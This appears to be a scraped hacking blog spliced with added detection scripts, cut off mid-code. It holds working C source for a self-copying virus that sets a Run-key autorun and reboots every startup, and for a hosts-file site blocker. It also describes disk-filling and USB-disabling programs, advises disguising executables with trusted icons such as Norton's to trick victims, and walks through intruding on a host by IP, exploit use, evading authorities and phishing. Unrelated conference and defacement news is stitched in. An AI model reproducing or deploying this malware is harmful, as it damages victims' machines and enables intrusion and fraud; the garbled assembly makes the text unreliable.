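    """Return groups of files whose first `block` bytes are identical.

    Unrelated files almost never share a full leading block, so a group of
    several files (especially of different types) is worth investigating.
    """
    groups = defaultdict(list)
    for name, data in heads.items():
        if len(data) >= block:  # shorter files cannot hold a full block
            groups[hashlib.sha256(data[:block]).digest()].append(name)
    return sorted(sorted(names) for names in groups.values()
                  if len(names) >= min_group)


def mz_outside_executables(heads):
    """Return non-executable files that start with the DOS/PE 'MZ' signature."""
    return sorted(
        name for name, data in heads.items()
        if data[:2] == b"MZ"
        and os.path.splitext(name)[1].lower() not in EXECUTABLE_EXTS
    )


def sample_heads():
    """Constructed directory contents: three overwritten files, three clean ones."""
    stub = b"MZ" + bytes(range(256)) * 8  # constructed stand-in for a program image
    return {
        "tool.exe": stub + b"tail-of-tool",
        "notes.txt": stub[:BLOCK] + b"rest of the notes",
        "photo.jpg": stub[:BLOCK] + b"\xff\xd9",
        "clean.txt": b"plain text " * 300,
        "clean.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 3000,
        "other.exe": b"MZ" + b"\x90" * 3000,
    }


if __name__ == "__main__":
    heads = sample_heads()  # replace with load_directory(r"C:\some\folder")
    for group in shared_prefix_groups(heads):
        print("identical leading block:", ", ".join(group))
    for name in mz_outside_executables(heads):
        print("executable header in non-executable file:", name)
```

Both results are review flags, not verdicts: restore flagged files from a known-good backup rather than trying to repair them, since the overwritten bytes are gone.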

A Virus Program to Restart the Computer at Every Startup


Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus needs to be double-clicked only once, and from then onwards it will carry out the rest of the operations. And one more thing, none of the antivirus software detects this as a virus since I have coded this virus in C. So if you are familiar with the C language then it’s easy to understand the logic behind the coding.
Here is the source code.
#include<stdio.h>
#include<dos.h>
#include<dir.h> int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}
NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.
 
Compiling The Source Code Into Executable Virus.
 
1. Download the Source Code Here
http://www.mediafire.com/?lh55hoa96zzie1s
2. The downloaded file will be Sysres.C
3. For a step-by-step compilation guide, refer to my post How to compile C Programs.
 
Testing And Removing The Virus From Your PC
 
You can compile and test this virus on your own PC without any fear. To test, just double-click the sysres.exe file and restart the system manually. From now on, every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.
 
1. Reboot your computer in SAFE MODE.
2. Go to X:\Windows\System (X can be C, D, E or F).
3. You will find a file named sysres.exe; delete it.
4. Type regedit in Run to open the Registry Editor. Here navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

There, on the right side, you will see an entry named “sres”. Delete this entry. That’s it. You have removed this virus successfully.
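The manual registry check in the removal steps can be scripted. The following is an added example, not code from the original post: it parses the text printed by `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and flags values that match the names used in the post or that launch a file from the Windows system directory. The sample output and all function names are constructed for illustration.

```python
import ntpath
import re

# One value line of `reg query` output: indent, then name, type and data
# separated by four spaces.
VALUE_LINE = re.compile(
    r"^\s+(?P<name>.+?)\s{4}(?P<type>REG_[A-Z_]+)\s{4}(?P<data>.*)$")
SYSTEM_DIR = re.compile(
    r"^(?:[a-z]:\\windows|%systemroot%|%windir%)\\system(?:32)?\\", re.I)
LAUNCHABLE = re.compile(r"(.+?\.(?:exe|com|bat|cmd|scr))(?:\s|$)", re.I)

# Indicators taken from the post: value name "sres", file name "sysres.exe".
PAGE_VALUE_NAME = "sres"
PAGE_FILE_NAME = "sysres.exe"

# Constructed sample of `reg query` output (not captured from a real system).
SAMPLE_REG_OUTPUT = r'''
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\demo\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    sres    REG_SZ    C:\windows\system\sysres.exe
    Updater    REG_EXPAND_SZ    %ProgramFiles%\Vendor\updater.exe
    Helper    REG_SZ    D:\Windows\System32\hlp.exe -q
'''


def command_target(data):
    """Extract the program path from a Run value's command line."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end != -1 else data[1:]
    match = LAUNCHABLE.match(data)  # unquoted path, may contain spaces
    if match:
        return match.group(1)
    return data.split()[0] if data else ""


def review_run_key(reg_output):
    """Return the Run values that deserve a manual look, with the reasons."""
    findings = []
    for line in reg_output.splitlines():
        m = VALUE_LINE.match(line)
        if not m:
            continue  # key header or blank line
        name, target = m.group("name"), command_target(m.group("data"))
        file_name = ntpath.basename(target).strip().lower()
        reasons = []
        if name.lower() == PAGE_VALUE_NAME or file_name == PAGE_FILE_NAME:
            reasons.append("matches the value or file name used in the post")
        if SYSTEM_DIR.match(target):
            # Legitimate entries can live here too, so this is a review flag.
            reasons.append("per-user autorun launches a file from the "
                           "Windows system directory")
        if reasons:
            findings.append({"value": name, "target": target,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for item in review_run_key(SAMPLE_REG_OUTPUT):
        print(item["value"], "->", item["target"])
        for reason in item["reasons"]:
            print("   ", reason)
```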
 
Logic Behind The Working Of The Virus
 
If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.
 
LOGIC:
 
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the virus file is already copied (already infected) into X:\Windows\System.
3. If not, it will just place a copy of itself into X:\Windows\System and make a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.
NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.
 
AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)
 
After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

How to Make a Trojan Horse

Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…
Before I move on to explain the features of this Trojan you need to know what exactly a Trojan horse is and how it works. Contrary to what most of us think, a Trojan or a Trojan horse is not a virus. In simple words, a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or cause damage to the computer.
 
Now lets move to the working of our Trojan
The Trojan horse which I have made presents itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space is too high. As a result the disk gets filled up to 100% within minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll extension it is often ignored by disk cleanup software. So for the victim, there is no way to recover the hard disk space except by reformatting his drive.
 
The algorithm of the Trojan is as follows
1. Search for the root drive
2. Navigate to Windows\System32 on the root drive
3. Create the file named “spceshot.dll”
4. Start dumping the junk data onto the above file and keep increasing its size until the drive is full
5. Once the drive is full, stop the process.
You can download the Trojan source code HERE. Please note that I have not included the executable for security reasons. You need to compile it to obtain the executable.
 

How to compile, test and remove the damage?

 
Compilation:
compile  the  C Programs
Testing:
To test the Trojan,  just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.
NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.
 
How to remove the Damage and free up the space?
To remove the damage and free up the space, just type the following in the “run” dialog box.
%systemroot%\system32
Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

A Virus Program to Block Websites


Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus needs to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-installs the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any browser program.

Here is the sourcecode of the virus.
#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
How to Compile ?
For step-by-step compilation guide, refer my post How to compile C Programs.
Testing
1. To test, run the compiled module. It will block the sites that are listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing the error “Page cannot displayed“.
3. To remove the virus, type the following in Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using Notepad. At the bottom of the opened file you’ll see something like this
127.0.0.1                                google.com
5. Delete all such entries which contain the names of blocked sites.
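The clean-up in steps 4 and 5 can be done as a scripted audit. The following is an added example, not code from the original post: it reads hosts-file text, reports every public-looking name pinned to a loopback or unspecified address, and produces a cleaned copy. The sample file content, the list of local names and the function names are constructed assumptions.

```python
import ipaddress

# Names that are expected to resolve to the local machine (assumed allowlist).
LOCAL_NAMES = {"localhost", "localhost.localdomain",
               "ip6-localhost", "ip6-loopback"}

# Constructed sample: a normal hosts file plus entries in the form the
# listing above appends (address, tab, site name).
SAMPLE_HOSTS = (
    "# constructed sample hosts file\n"
    "127.0.0.1       localhost\n"
    "192.168.1.20    fileserver.corp.example   # internal entry\n"
    "127.0.0.1 localhost www.example.org  # mixed line\n"
    "\n"
    "127.0.0.1\tgoogle.com\n"
    "127.0.0.1\twww.google.com\n"
    "127.0.0.1\tyoutube.com\n"
    "127.0.0.1\twww.youtube.com\n"
    "127.0.0.1\tyahoo.com\n"
    "127.0.0.1\twww.yahoo.com\n"
)


def parse_line(line):
    """Return (address_token, ip_object, names) or None for non-entry lines."""
    fields = line.split("#", 1)[0].split()
    if len(fields) < 2:
        return None
    try:
        ip = ipaddress.ip_address(fields[0])
    except ValueError:
        return None
    return fields[0], ip, fields[1:]


def is_redirected(ip, name):
    """True when a dotted, non-local name points at 127.x, ::1, 0.0.0.0 or ::."""
    host = name.lower().rstrip(".")
    points_nowhere = ip.is_loopback or ip.is_unspecified
    return points_nowhere and "." in host and host not in LOCAL_NAMES


def audit_hosts(text):
    """Return (line_number, address, name) for every redirected name."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        parsed = parse_line(line)
        if parsed is None:
            continue
        token, ip, names = parsed
        findings.extend((lineno, token, n) for n in names
                        if is_redirected(ip, n))
    return findings


def clean_hosts(text):
    """Return the hosts text with redirected names removed, the rest intact."""
    kept = []
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            kept.append(line)  # comments and blank lines stay as they are
            continue
        token, ip, names = parsed
        keep = [n for n in names if not is_redirected(ip, n)]
        if len(keep) == len(names):
            kept.append(line)  # untouched entry, keep it byte for byte
        elif keep:
            comment = line.partition("#")[2]
            rebuilt = token + "\t" + " ".join(keep)
            kept.append(rebuilt + ("\t#" + comment if comment else ""))
        # otherwise every name on the line was a redirect: drop the line
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    for lineno, address, name in audit_hosts(SAMPLE_HOSTS):
        print(f"line {lineno}: {name} -> {address}")
    print(clean_hosts(SAMPLE_HOSTS), end="")
```

Ad-blocking hosts files use the same pattern on purpose, so review the report before writing the cleaned copy back.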

How to Compile C Programs




In many of my previous posts especially in the VIRUS CREATION section, I have used C as the programming language. If you’re new to C programming and find it difficult to compile the C source codes then this post is for you. Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs.
 

How to install Borland C++ compiler

 
1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.
http://www.codegear.com/downloads/free/cppbuilder
2. After you download, run freecommandlinetools.exe. The default installation path would be
C:\Borland\BCC55
 

How to configure Borland C++ compiler

 
1. After you install the Borland C++ compiler, create two new Text Documents
2. Open the first New Text Document.txt file and add the following two lines into it
-I"c:\Borland\Bcc55\include"
-L"c:\Borland\Bcc55\lib"
Save changes and close the file. Now rename the file from New Text Document.txt to bcc32.cfg.
3. Open the second New Text Document (2).txt file and add the following line into it
-L"c:\Borland\Bcc55\lib"
Save changes and close the file. Now rename the file from New Text Document (2).txt to ilink32.cfg.
4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate to C:\Borland\BCC55\Bin and paste them.
 

How to compile the C source code (.C files)

 
1. You need to place the .C (example.c) file to be compiled in the following location
C:\Borland\BCC55\Bin
2. Now goto command prompt (Start->Run->type cmd->Enter)
3. Make the following path as the present working directory (use CD command)
C:\Borland\BCC55\Bin
4. To compile the file (example.c) use the following command
bcc32 example.c
5. Now if there exists no error in the source code you’ll get an executable file (example.exe) in the same location (C:\Borland\BCC55\Bin).
6. Now you have successfully compiled the source code into an executable file(.exe file).

A Virus Program to Disable USB Ports


In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of the C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result you’ll not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer

http://www.mediafire.com/?syb98wqnfe255bk.

2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it.

3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program.
I hope you like this post. Please pass your comments.

World's Largest Annual Hacker Conference, 26C3, Took place in Berlin last week

The 26th edition of the world's largest annual hacker conference, 26C3, took place in Berlin last week. With about 2,500 attendees, a combined total of 9,000 participants worldwide (via live streams), and an array of features that no other conference in the world can match, it was very much a milestone.

A bit on the word "hacker", as I know the term might be bothering some of you. A HACKER: one who tinkers, one who deconstructs out of a natural curiosity about how something works and how it could be made to do something it wasn't originally intended to do. Such abilities are akin to the skilled locksmith, and do not automatically make a hacker a criminal. Unfortunately for many who work in mainstream media, the word has been hijacked to be synonymous with "electronic evildoer". Yet, like many words that have been used to keep minority groups down, hackers are taking the label back.

Announcements such as the GSM encryption crack may have made international headlines last month, but something much more significant is clear: throughout the world, hackers have come out from their bunkers and opened up community spaces. They go by various names (co-working spaces, clubhouses, hideouts, space stations) and are a global-scale breakthrough for a community that for decades has not always been willing or able to go public. By opening up, they've not only gone public, but have also opened their doors to anyone curious or interested in the world of technology and how things work.

This phenomenon may be bigger than it has ever been, but in some corners of the world, it is not altogether new. Groups of German hackers have long organised themselves as officially recognised clubs and taken on challenges of a technical (or non-technical) nature. In North America, the movement has seen its greatest expansion in the past few years, with spaces such as NYC Resistor in Brooklyn, Pumping Station: One in Chicago and Noisebridge in San Francisco providing a creative space for a rapidly growing membership. The hacker space movement includes clubs in different parts of Latin America, as well as in South Africa, Israel, Iran, Dubai, Thailand, Malaysia, Singapore, Indonesia, Japan and Australia. Every month, the list gets longer as more groups come forward and post their details online at hackerspaces.org, a central hub and wiki for all info about spaces, including how to start one.

Among the attendees at the 26C3 conference were the people behind wikileaks, the wiki clearinghouse for leaked documents. In its first few years wikileaks has come under attack by governments and other large institutions who fear its growing influence and has made international headlines on several occasions, including when it was ordered to shut down by a California court in 2008 after documents were leaked related to offshore bank activities. Presenting at this year's congress, their goal was to explain how this project could become an essential tool for journalists throughout the world who seek sources and secure methods to protect the identity of those with access to – and brave enough to leak – sensitive information.

Also present was Bre Pettis and his Makerbot Industries. The knob on your dishwasher broke off? Trying in vain to contact customer assistance and find some way to get a replacement part? Well Pettis had a better idea, and by using a 3D printer, produced his own replacement knob. His tinkering with 3D printing has resulted in the founding of his very own company, Makerbot, which has actual employees and its own manufacturing space in Brooklyn, shipping Makerbots all over the world. Pettis didn't tell us to buy his stuff, but talked about what other people have been building and how he envisages a future where people aren't just consumers: he dreams of a return of the tradition of people making things.

It is hard not to be in awe of what this group of hackers was able to build for a four-day conference: its GSM network, an internal Dect phone system, a radio station, its own all-volunteer first aid and emergency rescue team and an indescribably fast network with capacity that no conference or municipality in the world can compete with. It is no wonder spaces are popping up everywhere, as hackers come out of the cupboards and stand proudly as the talented explorers and critical thinkers that they are.

Why was Vijay Mallya hacked?

While you were enjoying the Independence Day spirit and probably flying kites, an all out war was on between India and Pakistan.

Fortunately, it was not on the border but in cyberspace where hackers from the two countries were engaged in pitched battles to outdo each other.

According to cyber experts, more than a thousand websites were hacked into and defaced on August 14 and 15 when Pakistan and India celebrated their Independence respectively. The day came as a nightmare for some of the webmasters and website owners from the two nations. Pakistani hackers were first to strike on August 14 when they defaced Indian websites. The Indian side returned fire the following day.

Hackers from both the nations hacked the websites and posted flags of the respective countries on the targeted websites.

Two Pakistani groups, Pak Cyber Army and PakHaxors, started the attack. As per zone-h data, these groups have defaced around 10-20 websites. The counter attack from the Indian side was led by Indishell and Indian Cyber Army, who claim to have defaced 1,226 Pakistani websites. Zone-h data confirms the figure is more than 1,000 websites.

In retaliation the Pakistani hackers intensified the volume and nature of the attack resulting in the hacking of the website of UB group chairman and Rajya Sabha MP Vijay Mallya.

"This is a payback from Pak Cyber Army in return to the defacements of Pakistani sites! You are playing with fire!, This is not a game kids. We are warning you one last time, don't think that you are secure in this Cyber Space. We will turn your Cyber Space into Hell," the hacked site read.

A number of websites are hacked but most go unreported. There will be many Indian and Pakistani groups who are involved in this but the Indian side is mainly represented by ICW (Indian cyber warriors), ICA (Indian Cyber Army) and HMG (Hindu Militant Group) and Indishell. PCA (Pakistan Cyber Army), Pakbugs and Pakhaxors lead the Pakistani side.

Friday, August 27, 2010

Hack with ip address








So say somehow somewhere we ended up choosing a target to start wreaking havoc upon. All we need is an IP address. There are plenty of papers out there that go into how to obtain an IP address from the preferred mark of your choice, so I'm not going to go into that subject. Alright, so say we got the target's IP address finally. What do we do with this IP address? Well, first ping the IP address to make sure that it's alive, in other words online. Now at the bottom of this document I'll include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port scanners are used to identify the open ports on a machine that's running on a network; whether it's a router or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.

1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.

Example 1:
Idlescan using Zombie <Domain Name> (192.150.13.111:80); Class: Incremental
Interesting ports on 208.225.90.120:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https
1027/tcp open IIS
1030/tcp open iad1
2306/tcp open unknown
5631/tcp open pcanywheredata
7937/tcp open unknown
7938/tcp open unknown
36890/tcp open unknown


In example 1 we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (i.e. 80-HTTP, 25-SMTP, etc.). Simply take all that information and paste it into Notepad or the editor of your choice. This is the beginning of your target's record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know it's not that easy. Alright, so we don't even know what type of software or what operating system this system is running.



2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.

So we have to figure out what type of software this box is running if we are gonna start hacking the thing, right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons, and many of you haven't even heard of it before, period. TELNET is used to open a remote connection to an IP address through a port. So what that means is we are accessing their computer from across the internet; all we need is their IP address and a port number. With that record you are starting to compile, open a TELNET connection to the IP address and enter one of the OPEN ports that you found on the target.
So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25'. This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well, get that list you are starting to write, and copy the banners into your compilation of the information you've gathered on your target. Banners/headers are what you get when you TELNET to the open ports. Here's an example of a banner from port 25.





220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400


Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8' Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. 


There are some instances in which companies will try and falsify their headers/banners so ******* are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Banners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers.

This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, which contains lots of information, and if you are able to manipulate it then you can pretend to be hotmail, and steal a bunch of people's email. Well, now back to the task at hand.

Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.

At SecurityFocus you can search through vendor and whatnot to try and find your piece of software, or you can use the search box. When I searched SecurityFocus I found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed.


That pound symbol means that the command prompt window that's currently open was opened as root, the highest privilege on a UNIX/Linux box. You have just successfully hacked a box.




Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a ****ing jerk, however I don't recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, don't let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.

There are many types of exploits out there. Some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. It is called denial of service simply because you are denying a service on someone's box to everyone trying to access it. Buffer overflow exploits are involved when a variable inside some code doesn't have any input validation. Each letter you enter for the string variable will be 1 byte long. Now, where the variables are located when they are in use by a program is called the buffer.


Now what do you think overflowing the buffer means? We overflow the buffer so we can get to a totally different memory address. Then people write what's called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit.


That wasn't the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter http://www.bank.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think it's really http://www.bank.com

You need to have a small script set up so it will automatically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doesn't give it a second thought and will simply try again later.
__________________________________________________ _______o_________

So as a summary of how to 0Wn a box when you only have an IP Address
Method Works On BOTH *Nix and Windoze

****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****

- Port Scan The Address And Record Open Ports
- Telnet To Open Ports To Identify Software Running On Ports




3) netcat - Network Swiss army knife. Like TELNET, only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports.

- Record Banners And Take Note Of The Application Running and The Version Number
- Take A Gander Online At SecurityFocus.com or Eeye.com. If you can't find any vulnerabilities, then search Google.
- Make a copy of some Proof-Of-Concept code for the vulnerability.

*Read the documentation, if there is any, for the proof-of-concept code you will be using for your exploit*

- Run The Exploit Against The Victim.
- Reap The Cheap-Sh0t Ownage
_________________________________________________________________
**This document does not go into covering your tracks. If you dare try any of this stuff on a box you don't have consent to hack on, they will simply look at the logs and see your IP address and then go straight to your ISP. Once you get more 1337 you get to learn how to get away with the nasty deeds. This is what the majority of kode-kiddies do when they perform attacks. The key is to enumerate all the info you can from the machine; the more info you have on the system, the better. User accounts can also be enumerated. Once you have a list of account names, you may then proceed to brute-force or perform a cryptanalysis attack to gain control of the account. Then you must work on privilege escalation. Users are not Admins/Root**
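The remark above that the target "will simply look at the logs" is the defender's side of the port-scan step: one source touching many different ports stands out in any connection log. The C code below is an added example, not part of the original post; the log format, the threshold of 5 distinct ports and the sample lines are constructed assumptions.

```c
#include <stdio.h>
#include <string.h>

enum { MAX_SRC = 32, MAX_PORTS = 64, SCAN_THRESHOLD = 5 }; /* threshold is assumed */
struct src_stat { char ip[46]; int ports[MAX_PORTS]; int nports; };

/* Constructed sample log; assumed format "<epoch> <src-ip> <dst-port>". */
const char *SAMPLE_LOG[] = {
    "1283000000 203.0.113.7 21",  "1283000000 203.0.113.7 22",
    "1283000001 198.51.100.4 80", "1283000001 203.0.113.7 23",
    "1283000001 203.0.113.7 25",  "1283000002 203.0.113.7 80",
    "not a log line",             "1283000004 198.51.100.4 443",
};

/* Record one (source, port) pair; return that source's distinct-port count. */
static int record(struct src_stat *tab, int *nsrc, const char *ip, int port)
{
    int i = 0, j;
    while (i < *nsrc && strcmp(tab[i].ip, ip) != 0) i++;
    if (i == *nsrc) {                         /* source not seen before */
        if (*nsrc == MAX_SRC) return 0;       /* table full: not tracked */
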